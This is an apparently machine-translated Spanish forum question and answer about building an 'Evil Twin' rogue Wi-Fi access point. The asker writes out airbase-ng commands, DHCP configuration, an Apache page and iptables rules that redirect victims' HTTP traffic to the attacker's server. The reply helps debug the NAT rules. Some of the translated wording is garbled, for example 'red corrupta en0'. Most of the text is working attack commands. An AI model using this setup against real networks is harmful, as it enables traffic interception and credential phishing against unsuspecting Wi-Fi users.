
He estado investigando el método Evil Twin y encontré estos pasos:
Creando AP
airmon-ng start wlan0 airbase-ng -e PrivateWIFI -c 9 -v mon0
at0
Configuraciónifconfig at0 up ifconfig at0 192.168.1.20 netmask 255.255.255.0 route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.20
Ejecute DHCP
echo > '/var/lib/dhcp/dhcpd.leases' /etc/init.d/isc-dhcp-server start OR dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0 ( the both of them is working fine )
Archivo dhcpd.conf:
ddns-update-style interim;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option routers 192.168.1.1;
option domain-name-servers 8.8.8.8;
range 192.168.1.2 192.168.1.250;
}
y luego inicié mi servidor apache2
(Hasta aquí no hay problema)
Estado (puedo abrir mi servidor web 192.168.1.20 desde mi teléfono y ver la página web que he creado :) :))
Pero el problema es que cuando agrego comandos de iptables no pasa nada:
iptables --flush
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.20:80
iptables -t nat -A POSTROUTING -j MASQUERADE
echo "1" > /proc/sys/net/ipv4/ip_forward
////////////////////////////////////////////////////////////////////////
iptables --flush
iptables --table nat --append POSTROUTING --out-interface at0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.20:80
iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 192.168.1.20:80
iptables -t nat -A POSTROUTING -j MASQUERADE
echo "1" > /proc/sys/net/ipv4/ip_forward
Ninguno de los dos funciona, ojalá alguien pudiera ayudarme.
Respuesta1
No sé si el problema es que tu navegador está siendo redirigido al servidor web o si no accede a Internet, pero veo algo que deberías solucionar.
Deberías tener sólounointerfaz enmascarada, no dos. El correcto eseth0(asumiendo que es la única interfaz que estádirectamenteconectado a Internet), no elred corrupta en0interfaz. Por lo tanto, debes eliminar esa penúltima línea.
Una vez dicho esto, vea si las cosas funcionan como espera. De lo contrario, proporciónenos una descripción precisa de su problema junto con su diagnóstico actual.
Atentamente.